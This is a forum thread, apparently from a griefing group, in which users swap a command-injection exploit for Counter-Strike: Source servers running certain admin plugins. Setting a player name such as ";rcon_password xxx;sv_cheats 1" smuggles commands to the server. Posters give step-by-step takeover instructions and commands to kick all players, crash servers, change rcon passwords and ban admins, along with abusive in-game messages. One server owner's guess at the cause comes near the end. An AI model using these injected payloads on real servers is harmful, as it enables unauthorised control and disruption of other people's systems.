Jump to content

[Exploit] CSP, Euroblock, ZBlock, and Cvarblock servers

myg0tSourceX
myg0tSourceX
in News

Featured Replies

@Dj 6230

Yes. You can replace the names with what you want.

 

Also, I don't think you even need to have a name infront. I think this would work.

name ";ma_cexec_all name myg0t"

name ";sv_gravity 1"

You just need to have a ";" to start with.

 

You also don't have to use brakets "[ ]" for setting a name. This would work.

name ";ma_cexec_all name retard"

  • Replies 159
  • Views 9.8k
  • Created
  • Last Reply

Top Posters In This Topic

Popular Days

  r4g3dSkillz said:
@Dj 6230

Yes. You can replace the names with what you want.

 

Non of it work...is the server patched then?

Thanks a lot guys :D Been using different commands for about an hour.

 

Better to use "ba_kick #ALL" to kick everyone off a server and then it gives you time to mess around and change the rcon password :D Good fun. All servers that i've tried I've managed to crash somehow. They always stop responding. Good fun though and brilliant exploit.

is it me or does it work only wid servers that have 0.4e Online Edition value for the servers.

Hahaha

 

It was great.. I had two people come in with names of myg0t, they used this, I was alright with that. Then they started trying to rage. They failed dismally. I thought when you rage, you're supposed to piss off the others, not get pissed off by the others. ;) I pissed him off so much, he left the server in embarrassment.

 

Anyways, good job guys.

  rizbiz said:
is it me or does it work only wid servers that have 0.4e Online Edition value for the servers.

 

Yes, or 0.5c. The 0.5.1 servers are patched..

i got it to work with this CSP server but its a bitch finding a server to test it on that has CSP and has mani admin plugin...

Why i can only execute ma_-Commands, rcon_password XXX doesn't work, sv_gravity 1 doesn't work eather, whats my fault..?

:thinker:

hey

if i join a server with

name "bob;rcon_password ***"

and type

rcon_password ***

then try an rcon command

and i get Bad Rcon Password....

 

what does this mean, what have i done wrong?

I join a server with the name of myg0t;ma_cexec_all name [myg0t]

Everyone's name changes to mygot and in console the CVAR stuff appears, but I cant' execute any commands, when I try to it tells me 'only server operate can bla bla".

Am I doing something wrong?

  daad said:

...like: rcon killserver.. etc.

Killing the server means you will completely fuck up the server, because the server cannot be acces thru FTP, it can only be turned on manually by your provider.

 

the ones i killed, restarted automatically after a while.

  groovyg said:
hey

if i join a server with

name "bob;rcon_password ***"

and type

rcon_password ***

then try an rcon command

and i get Bad Rcon Password....

 

what does this mean, what have i done wrong?

 

That won't work: name ";rcon_password bob;sv_cheats 1"

 

SV CHEATS 1 has to be in your name, otherwise rcon_password bob won't work..

 

@nimrod, strange, I've killed some servers that didnt restart..:thinker:

  daad said:
That won't work: name ";rcon_password bob;sv_cheats 1"

 

SV CHEATS 1 has to be in your name, otherwise rcon_password bob won't work..

 

@nimrod, strange, I've killed some servers that didnt restart..:thinker:

 

 

some of the ones i killed didnt restart for like a day, (maybe windows servers?)

  daad said:

SV CHEATS 1 has to be in your name, otherwise rcon_password bob won't work..

actually this way never worked for me. because the name would be too long and sv_cheats 1 would not be processed. on the other hand, you can only set sv_cheats 1 if you logged into rcon before.

 

to clear things up, this is how i do it:

as name:

name "name;rcon_password *****;"

 

in console:

rcon_password *****

rcon rcon_password *****

rcon sv_cheats 1

 

oh and btw, to change the server name, never worked for me. i tried:

rcon hostname myg0t.com

 

i tried to find a way to write the current server config to the cfg file. but im aware of such a command :/. because after a server restart, everything is back to normal.

ok ty got it to work

for those who havnt understood yet, this is what i do

1. Open Console

2. Type name ";rcon_password xxx;sv_cheats 1" (no name before the ;, and i chose xxx as password because its easy)

3. Find a server using the links provided earlier ( look for version 0.4e)

4. Connect IP (ip is the ip... duh)

5. Rcon_Password XXX

6. Wait a sec, then type Rcon Rcon_Password ASS (or anything else that isnt your last one)

7. If your have big ping, type Rcon Mani_high_ping_kick 0

8. Use Rcon [command] to have fun

some fun ones are

Rcon Ma_Gimp #All

Rcon Sv_bounce 9000 (or any large number)

Rcon Ma_cexec_all Say Im a Homo Cunt, Ass Rape me PLZ

 

oh, and dont forget to take the knife out and type Noclip (cuz sv_cheats 1 is on)

those arent destructive, just fucking annoying ;)

Can someone post instructions on how to ban the admins?

Cause I dont know how to find out their IP and the ban command.

@geotop

This explains how to add a partial name to the auto kick list.

  Quote
nimrod']

name "name;ma_akick_pname ["

(note: sets the string [ (in a name) to auto kick list, this way you auto kick clan members from their own server (cept if they are on immune list))

Hi, firstly excuse my english.

 

I don't know really what you mean by CSP, Euroblock, ZBlock, and Cvarblock servers :/ I only notice that in game monitor, some servers appear with cvarblock variables, but not my server, which appear with mani variables at this place.

 

So I try this exploit on my server, and some feature work fine, and others don't work.

I've got mani_admin_plugin 1.1.0zh and HLstatsX 1.0 working on.

 

I don't investigate all of the possible commands that you try for this exploit, only a few, but I notice that when I desactivate the HLstatsX, the exploit doesn't work anymore. I don't know why, but I imagine the following:

 

My HLstatsx perl script run on my web server which is on a different box that the one onto CSS is running (yeah my english is so fine ^^)

HLstatsx gets in real time the logs of the css server (it connect tu the udp streamming of the game), caculate the stats and mani others informations, and resend these one's to the server.

The server is capable of read these informations beacause of the declaration in the config file of the command:

logaddress_add xxx.xxx.xxx.xxx:27500 (which is the ip of the box running HLstatsx).

But in the configuration of the HLstatsx, we have to put the rcon of the css server, if not, no display of stats was possible.

 

So I think (but maybe I'm wrong, I don't know) that the "injection code" defined in this exploit is firstly logged by the HLstatsX perl script and then reload by the css server with the rcon rights gave by the perl script :/ ... and therefore executed by the css server ...

 

Maybe it is not the only way for an injection code to get rcon rights ;)

Guest
This topic is now closed to further replies.
Go to topic listing